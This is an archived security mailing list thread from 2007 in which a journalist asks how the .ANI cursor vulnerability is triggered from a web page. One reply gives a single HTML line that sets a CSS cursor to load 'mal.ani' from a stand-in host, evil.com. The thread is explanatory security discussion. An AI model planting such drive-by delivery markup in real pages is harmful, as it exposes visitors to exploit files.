funsec mailing list archives
RE: How do you load a .ANI from a web page?
From: "Larry Seltzer" <Larry () larryseltzer com>
Date: Sat, 31 Mar 2007 17:51:05 -0400
Thanks. BTW, I had also read that Firefox would be affected by this bug, but their docs (http://developer.mozilla.org/en/docs/Using_URL_values_for_the_cursor_pr operty) specifically state that .ANI is not supported. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ <blocked::http://security.eweek.com/> http://blog.eweek.com/blogs/larry%5Fseltzer/ <http://blog.eweek.com/blogs/larry_seltzer/> <http://blog.ziffdavis.com/seltzer> Contributing Editor, PC Magazine larryseltzer () ziffdavis com ________________________________ From: avivra [mailto:avivra () gmail com] Sent: Saturday, March 31, 2007 5:47 PM To: Larry Seltzer; funsec () linuxbox org Subject: RE: [funsec] How do you load a .ANI from a web page? Hi Larry, A cursor css style. e.g. <div style="cursor:url(http://evil.com/mal.ani)"></div> More info can be found here: http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml /reference/properties/cursor.asp --Aviv. From: funsec-bounces () linuxbox org [mailto:funsec-bounces () linuxbox org] On Behalf Of Larry Seltzer Sent: Sunday, April 01, 2007 12:15 AM To: funsec () linuxbox org Subject: [funsec] How do you load a .ANI from a web page? I keep hearing that the .ANI vulnerability can be invoked just by viewing a web page. How do you load a .ANI file from a web page? Related question: I keep hearing that you can be exploited from plain text mail. How the hell is this possible, or is it just a matter of web links and file attachments? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ <blocked::http://security.eweek.com/> http://blog.eweek.com/blogs/larry%5Fseltzer/ <http://blog.eweek.com/blogs/larry_seltzer/> Contributing Editor, PC Magazine larryseltzer () ziffdavis com
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- How do you load a .ANI from a web page? Larry Seltzer (Mar 31)
- Message not available
- RE: How do you load a .ANI from a web page? Larry Seltzer (Mar 31)
- Message not available
- RE: How do you load a .ANI from a web page? Richard M. Smith (Mar 31)
- <Possible follow-ups>
- RE: How do you load a .ANI from a web page? Randall M (Mar 31)
- RE: How do you load a .ANI from a web page? Larry Seltzer (Mar 31)
- RE: How do you load a .ANI from a web page? Fergie (Mar 31)